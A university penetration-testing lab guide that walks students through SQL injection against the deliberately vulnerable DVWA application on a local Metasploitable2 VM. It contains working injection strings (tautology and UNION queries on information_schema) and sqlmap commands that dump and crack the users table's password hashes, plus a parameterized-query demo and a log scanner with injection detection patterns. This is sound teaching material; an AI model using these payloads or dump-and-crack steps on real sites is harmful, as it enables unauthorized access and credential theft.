
M07.02.I.v.2 - SQL Injection

This document provides a detailed lab guide for exploiting a website using SQL injection, a common web exploitation technique. It outlines tasks for setting up a vulnerable web application, executing SQL queries, and using tools like sqlmap to extract database information. The document emphasizes the importance of understanding SQL injection and its implications in web security.

Uploaded by Ama Ghana

INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 1

SQL INJECTION
INSTRUCTIONS:
In this lab, you will learn to exploit a website using SQL injection. SQL injection is one of the most widely used
exploitation techniques against web technology. Its importance is reflected in the list of top web application risks
published by OWASP (Open Web Application Security Project). SQL injection exposes the website's backend database and is
possible mostly because of web developers' mistakes. SQL injections can be done at various levels, with simple to complex
SQL commands.

This activity will require the Kali Linux VM for Internet access in vSphere.

PART 1 - GETTING STARTED WITH DVWA


TASKS
Task 1

Start Kali and the Metasploitable2 VMs.

Task 2

On Kali, open Firefox and go to the DVWA website running on Metasploitable2: http://192.168.10.20/dvwa

Log in to the DVWA website with the username (admin) and password (password).

Task 3

In the left-hand column of the DVWA page, scroll down and click on DVWA Security.


Task 4

In the drop-down menu change the security level to “Low” and click submit. This will make DVWA more vulnerable for
this activity.


Task 5

In the left-side menu, click on Setup / Reset DB.

Scroll to the bottom of the page and click on the "Create / Reset Database" button. This will create the SQL database
needed for this activity.

Task 6

In the left-side menu, click on SQL Injection.


Task 7

A database is an organized collection of information and data. Databases usually run on the backend of websites to store
information. For example, Facebook is one big database. Your username, profile information, and all your posts, videos and
pictures are kept in a backend database. You interact with a database in a few ways. On a website you interact with the
database by clicking on a link or typing in a search box. For example, if you type a friend's name in the search box on
Facebook, it looks up all the information in the database about your friend and displays it. The same thing happens when
you click on a link to a particular group page on Facebook: this initiates a search in the Facebook database and retrieves
all the information about that page.

Developers use a query language called SQL (Structured Query Language) in the programming code, so when you use the
search box or click on a link, the SQL code is run and displays the information you requested.

Task 8

Let’s test our database. Navigate to “SQL Injection” from the left-side menu and enter the number “1” (one) in the user
ID field and click “Submit”.

When you click submit you are executing SQL code to look for User ID 1 (one). Below the search field you will see the
result of your search, which shows user ID 1 has a First name of “admin” and a Surname (Last name) of “admin”.

Task 9

A database is made of rows, or records. Below (screenshot) are the first 2 records of the users table in the DVWA database we
are connected to on this website.


Notice that the first user_id (number 1) is admin admin and that the second user_id (number 2) is Gordon Brown. This is
the information in the database that is retrieved when we do a search on the website.

Task 10

Review the SQL code below that is tied to the submit button on the website that retrieves the information from the
database.

"SELECT first_name, last_name FROM users WHERE user_id = '$id'";

Here is an explanation of the code above.

SELECT first_name, last_name - This means select or find the first_name and last_name fields in the database.

FROM users - This means use the database table users. The first_name and last_name fields must be on this table.

WHERE user_id = '$id' - This means search for the user_id entered in the search field. When you enter "1" in the search
field, the clause changes to WHERE user_id = '1' to look up user_id 1.

; (The semi-colon) - The semi-colon is important because it indicates the end of your SQL query.

Notice the result I get when I run the query and change "user_id = '$id'" to "user_id = '2'".

SELECT first_name, last_name FROM users WHERE user_id = '2'

Enter the number 2 in the search field on the website and notice how you are retrieving the same user information,
Gordon Brown.

Take a screenshot that you successfully completed this task on the website.

Paste your screenshot on the answer sheet as Screenshot 1.

Task 11

Also, notice that your search for user ID 1 is captured in the URL.


You can actually manipulate the search results from the URL. In the URL field, change "id=2" to "id=3".

Change this: (screenshot of the URL ending in id=2)

to: (screenshot of the URL ending in id=3)

What is the user’s First name and Last name for the person associated with ID 3?

Submit your response on the Answer Sheet as Answer 1.

Task 12

We can manipulate the SQL code in the search field to get different results.

But first, use the following Wikipedia link or other online resources to research SQL Injection.

https://en.wikipedia.org/wiki/SQL_injection

In your own words, explain what SQL injection is and why it is able to happen.

Respond on the Answer Sheet as Answer 2.


Task 13

Let's inject some SQL code into the search field on the website to manipulate our search results to pull all the names in
the database. We do this by injecting SQL code and changing the original SQL query.

In the search field enter the following code exactly as it is below. Be careful that you have all the single quotes exactly as
stated.

%' or '1'='1

Click submit.

How many users are in the database and what are their names?

Respond on the Answer Sheet as Answer 3.

Task 14

We changed the SQL code on the website from:

SELECT first_name, last_name FROM users WHERE user_id = '$id'

to:

SELECT first_name, last_name FROM users WHERE user_id = '%' or '1'='1';

The percent sign (%) does not equal any user_id, so that comparison is false. The '1'='1' comparison is always true, since 1
will always equal 1. Because the OR makes the WHERE condition true for every row, the query lists all the names in the
database.
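As an added illustration (not part of the lab), the Python below rebuilds the lab's lookup against a constructed in-memory SQLite copy of the users table, runs the Task 13 input through a DVWA-style string-built query and through a parameterized query, and shows that only the string-built version returns every row. The user names other than admin and Gordon Brown are constructed, not DVWA's.

```python
import sqlite3

# Constructed stand-in for DVWA's users table (the real one is in MySQL).
# Only admin/admin and Gordon Brown come from the lab text; the rest are made up.
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Carol", "Example"),
    (4, "Dave", "Example"),
]

def make_db():
    """Build an in-memory database with the same columns the lab's query uses."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn

def lookup_vulnerable(conn, user_input):
    """DVWA 'low' style: the raw field value is pasted into the SQL text, so a
    quote in the input closes the literal and the rest becomes SQL syntax."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_input}'"
    return conn.execute(query).fetchall()

def lookup_safe(conn, user_input):
    """Parameterized form: the value travels separately from the SQL text, so
    quotes, OR clauses and comment markers inside it are data, never syntax."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_input,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "%' or '1'='1"               # the Task 13 input
    print(lookup_vulnerable(db, "1"))      # [('admin', 'admin')]
    print(lookup_vulnerable(db, payload))  # every row: the tautology defeats the WHERE
    print(lookup_safe(db, payload))        # []: treated as a literal id, matches nothing
```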

Task 15

We can also find the SQL database version. This gives us the opportunity to look up any vulnerabilities the database may
have.

Enter the following into the search field. Be careful to type it exactly.

%' or 0=0 union select null, version() #


What is the version of the MariaDB database?

Respond on the Answer Sheet as Answer 4.

Task 16

Inject the following code in the website search field to get more information. Most of the information will be displayed at
the bottom of the search results.

Find the database user's login information.

%' or 0=0 union select null, user()#

Find the name of the database.

%' or 0=0 union select null, database()#

Find all the names of the column fields on the users table.

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

What is the name of the Database user’s login name?

Respond on the Answer Sheet as Answer 5.
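From the defender's side, as an added example that is not part of this lab: a small Python scanner that pulls the id parameter out of constructed Apache access-log lines for the DVWA sqli page and flags the injected values from Tasks 13-16 by the signatures they use (tautology, UNION, information_schema, trailing comment), treating anything that is not a plain integer as suspect. The log lines, client IP address and timestamps are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines for DVWA's sqli page. Lines 3-5
# carry the payloads typed in Tasks 13-16, URL-encoded as a browser would send them.
SAMPLE_LOG = """\
192.168.10.50 - - [10/Oct/2023:10:00:01 -0400] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
192.168.10.50 - - [10/Oct/2023:10:00:09 -0400] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4526 "-" "Mozilla/5.0"
192.168.10.50 - - [10/Oct/2023:10:01:15 -0400] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+%271%27%3D%271&Submit=Submit HTTP/1.1" 200 4890 "-" "Mozilla/5.0"
192.168.10.50 - - [10/Oct/2023:10:02:30 -0400] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+0%3D0+union+select+null%2C+version%28%29+%23&Submit=Submit HTTP/1.1" 200 4910 "-" "Mozilla/5.0"
192.168.10.50 - - [10/Oct/2023:10:03:02 -0400] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+and+1%3D0+union+select+null%2C+concat%28table_name%2C0x0a%2Ccolumn_name%29+from+information_schema.columns+where+table_name+%3D+%27users%27+%23&Submit=Submit HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Signatures for the techniques this lab uses. Any non-numeric id is flagged as
# well, because the legitimate form only ever submits an integer.
SIGNATURES = [
    ("tautology (or 'x'='x')", re.compile(r"\bor\b\s*'?\w+'?\s*=\s*'?\w+", re.I)),
    ("union-based extraction", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("schema enumeration", re.compile(r"information_schema", re.I)),
    ("comment to truncate query", re.compile(r"(#|--)\s*$")),
]

def classify_id(value: str) -> list[str]:
    """Return the reasons a submitted id looks like injection (empty if clean)."""
    if re.fullmatch(r"\d+", value):
        return []
    reasons = ["non-numeric id"]
    reasons += [name for name, rx in SIGNATURES if rx.search(value)]
    return reasons

def scan_log(log_text: str) -> list[tuple[int, str, list[str]]]:
    """Return (line number, decoded id, reasons) for every request whose id is suspect."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # parse_qs percent-decodes and turns '+' back into spaces
        params = parse_qs(urlsplit(m["target"]).query)
        for value in params.get("id", []):
            reasons = classify_id(value)
            if reasons:
                findings.append((lineno, value, reasons))
    return findings

if __name__ == "__main__":
    for lineno, value, reasons in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: id={value!r} -> {', '.join(reasons)}")
```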

PART 2 - SQLMAP
Task 17

Let’s exploit the information we found to find user login information for the website. We will be using a tool called
sqlmap to assist us through this process.

Before we can begin to use sqlmap we need the cookie session key. Since we are running the website locally on Kali Linux
we will open the developer tools in Firefox to get those keys. Click on the Firefox menu icon in the top-right corner and
click on More Tools. Then click on Web Developer Tools.


Task 18

The developer toolbox will open at the bottom of the browser. Click on Storage from the top toolbox menu and expand
the Cookies listing from the left column menu.


Your cookie session will be different from the one in the screenshot above.

Task 19

Reset the database as you have done previously. Then navigate to SQL Injection on the website and make sure everything
is working as expected by entering a 1 in the User ID field and pressing enter.

Go to the url bar and copy the url to use in the sqlmap command.

Task 20

The sqlmap command is lengthy and contains various bits of information. Make sure to construct the sqlmap command
carefully.

1. Return to a terminal in Kali or open a new terminal.

2. Enter the first part of the command using the URL of the website. You can right-click in the terminal then paste.
(Don't press enter yet)

sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#


3. Add a backslash (\) before the ampersand (&) symbol in the URL (use the arrow keys to navigate). NOTE: notice
the backslash below. Make sure not to use a forward slash, which is different.

sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit#

4. Next, add 2 dashes, the word cookie and an equal sign to the command.

sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie=

5. Copy the cookie information from the Firefox web toolkit and paste it in the command line after "--cookie=". You
can double-click in the web toolkit to select the cookie data to copy it. Copy the cookie information in the format
below. Your cookie information will be different from this example. Add "security=low" after "cookie=", then the
PHPSESSID part second, separated by a semi-colon (;).

sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie=security=low; PHPSESSID=ut6uquo9g2qdnekt81366eir4l

6. Add single quotes around the cookie information. See the quotes below.

sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=ut6uquo9g2qdnekt81366eir4l'

7. Finish the command with a single dash and "dbs" (database search). Your full command should look similar to
below:

sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=ut6uquo9g2qdnekt81366eir4l' -dbs

8. Once you have verified that your command is correct, press enter to run the command. If the command executes
correctly it should look similar to the screenshot below.


The command will run and fill the terminal with text and then stop and prompt you for a question.

Task 21

Notice that sqlmap found that we are running a MySQL database.

We are asked "Do you want to skip test payloads specific for other DBMSes?". Press "Y" for yes or just press enter,
because we don't want sqlmap to test for any other database management systems (DBMS). It found MySQL as the database
we are using, so we want it to skip all the others. You would answer no if you were running other databases.

Task 22

Next we are asked if we "want to include all tests for 'MySQL' extending provided level (1) and risks (1) values?". Press
"Y" for yes or just press enter, because we want sqlmap to test MySQL.

Other questions:
"Do you want to keep testing the others (if any)?" Answer No.

If you are prompted with any other questions, just press enter for the default option.

Task 23

If run correctly the sqlmap command should have found 2 databases. What is the name of the first database?


Respond on the Answer Sheet as Answer 6.

Task 24

Let's find the tables on this database. In the terminal, press the up arrow to repeat the last command so you don't need
to re-type the whole sqlmap command again. Remove -dbs from the end and replace it with --tables -D dvwa. NOTE:
There are 2 dashes before "tables" and only 1 dash before "D".

sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=ut6uquo9g2qdnekt81366eir4l' --tables -D dvwa

Take a screenshot of the 2 table names in the dvwa database.

Paste your screenshot on the answer sheet as Screenshot 2.

Task 25

Passwords are most likely kept in the users table of the database. Let's look at the column names of the users table. Press
the up arrow to repeat the last command so you don't need to re-type the whole sqlmap command again, remove
"--tables -D dvwa" and replace it with "--columns -D dvwa -T users". NOTE: There are 2 dashes before "columns" and only
1 dash before "D" and "T".

sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=ut6uquo9g2qdnekt81366eir4l' --columns -D dvwa -T users

Take a screenshot of the column names on the users table. NOTICE: One of the column names is password.

Paste your screenshot on the answer sheet as Screenshot 3.

Task 26

Let's look at all the information in the users table (including passwords). Use the previous command but replace
"columns" with "dump".

sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=ut6uquo9g2qdnekt81366eir4l' --dump -D dvwa -T users

When prompted, "Do you want to store hashes to a temporary file for eventual future processing with other tools?", in
this case we will answer no or press enter for the default.

When prompted, “Do you want to crack them via a dictionary-based attack?” Answer yes or press enter for the default.

When asked, “What dictionary do you want to use?”, select 1 or press enter for the default.

When prompted, "Do you want to use common password suffixes?”, answer no or press enter for the default.

sqlmap will now attempt to crack the password hashes stored in the database. You should now see each password hash with
the recovered (cracked) password in parentheses.

What is the password for admin? What is the password for pablo?

Respond on the Answer Sheet as Answer 7.

Task 27

Now log in as one of the users whose password we have successfully acquired. In the left-side menu, click logout.

Then, login as pablo, using the password you obtained in the previous task. Once logged in, scroll to the bottom of the
home screen and take a screenshot to show that you successfully logged in as pablo.


Paste your screenshot on the answer sheet as Screenshot 4.

PART 3 - REFLECTION
Task 28

This lab manipulated the results of the database on a website, which resulted in information gathering. None of the SQL
injections we did caused any destruction or harm to the website. Research or think about what destructive or harmful
activities a malicious attacker could carry out with SQL injection. What would be the result?

Respond on the Answer Sheet as Answer 8.

Task 29

Research what strategies can be used to prevent SQL injection. Write this as recommendations you would give to a
business.

Respond on the Answer Sheet as Answer 9.
